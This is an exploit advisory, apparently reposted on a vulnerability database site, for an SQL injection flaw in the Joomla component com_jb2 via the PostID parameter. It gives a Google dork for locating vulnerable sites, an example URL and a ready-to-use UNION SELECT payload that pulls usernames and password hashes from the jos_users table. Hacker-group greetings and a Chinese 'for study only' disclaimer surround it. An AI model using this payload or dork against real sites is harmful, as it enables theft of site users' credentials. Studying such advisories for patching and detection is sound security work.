####################################################### Joomla Component com_jb2(PostID) SQL-injetion Vulnerability ####################################################### ################################################### #[~] Author : boom3rang #[~] Kosova Hackers Group [www.khg-crew.ws] #[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1. #[!] Module_Name: com_jb2 #[!] Script_Name: Joomla #[!] Google_Dork: inurl:"option=com_jb2 "PostID" ################################################## -------------------------------------------------------------------------------------------------------------------------------------------------- #[~] Example: http://localhost/Path/index.php?option=com_jb2&PostID=[exploit] -------------------------------------------------------------------------------------------------------------------------------------------------- #[~] Exploit: -9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/* -------------------------------------------------------------------------------------------------------------------------------------------------- ############################## #[!] Proud 2 be Albanian #[!] Proud 2 be Muslim #[!] United States of Albania ##############################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论